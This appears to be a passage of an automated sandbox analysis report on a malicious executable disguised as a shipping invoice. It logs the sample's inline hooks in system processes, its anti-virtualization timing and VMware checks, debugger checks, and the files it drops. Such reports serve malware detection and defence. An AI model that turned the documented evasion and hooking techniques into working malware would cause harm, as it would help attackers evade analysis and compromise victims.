          Hooking and other Techniques for Hiding and Protection:

          barindex
          Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 77165050 value: E9 EB 61 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 771650F0 value: E9 5B 61 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 77165180 value: E9 9B 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 77165190 value: E9 CB 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 771651A0 value: E9 4B 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 7717FEE0 value: E9 9B FF FF FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 771133C0 value: E9 FB 6F 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 77114760 value: E9 2B 6B 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 770D6590 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 770DB510 value: E9 2B 53 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 770FC490 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 7711EE00 value: E9 E1 52 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 7711EFD0 value: E9 26 5B 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77165050 value: E9 EB 61 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 771650F0 value: E9 5B 61 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77165180 value: E9 9B 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77165190 value: E9 CB 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 771651A0 value: E9 4B 60 FB FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 7717FEE0 value: E9 9B FF FF FF
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 771133C0 value: E9 FB 6F 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77114760 value: E9 2B 6B 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 770D6590 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 770DB510 value: E9 2B 53 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 770FC490 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 7711EE00 value: E9 E1 52 00 00
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 7711EFD0 value: E9 26 5B 00 00
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 77165050 value: E9 EB 61 FB FF
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 771650F0 value: E9 5B 61 FB FF
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 77165180 value: E9 9B 60 FB FF
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 77165190 value: E9 CB 60 FB FF
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 771651A0 value: E9 4B 60 FB FF
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 7717FEE0 value: E9 9B FF FF FF
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 771133C0 value: E9 FB 6F 00 00
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 77114760 value: E9 2B 6B 00 00
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 770D6590 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 770DB510 value: E9 2B 53 00 00
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 770FC490 value: E9 0B 00 00 00
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 7711EE00 value: E9 E1 52 00 00
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 7711EFD0 value: E9 26 5B 00 00
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000004085C4 second address: 00000000004085CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 000000000040894E second address: 0000000000408954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002F685C4 second address: 0000000002F685CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002F6894E second address: 0000000002F68954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00408880 rdtsc
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exeJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\pkgs\rcxditui.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exeJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exeJump to dropped file
          Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -190000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6744Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\netsh.exe TID: 2928Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00406469 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00402765 FindFirstFileA,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.709985267.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.923834797.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.709985267.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.701787722.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.710156984.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.710616810.000000000A9CC000.00000004.00000001.sdmpBinary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI
          Source: explorer.exe, 00000004.00000000.710247999.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00408880 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00409AF0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10004CBC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_1000734B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C08CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B5746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BE8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B3AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B5C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B57D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C08D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B73D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C08ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BB46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BCFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C00EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BEFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BEFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B34F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B34F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C08F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BCFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BCFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B4EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B39080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BB7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C01074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B5C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B3B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B54120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B39100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B3B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B5B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BEB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C05BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C08B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00800000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00800CE4 mov edi, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00802C5D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00804E70 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03733B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03733B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734BAD mov eax, dword ptr fs:[00000030h]
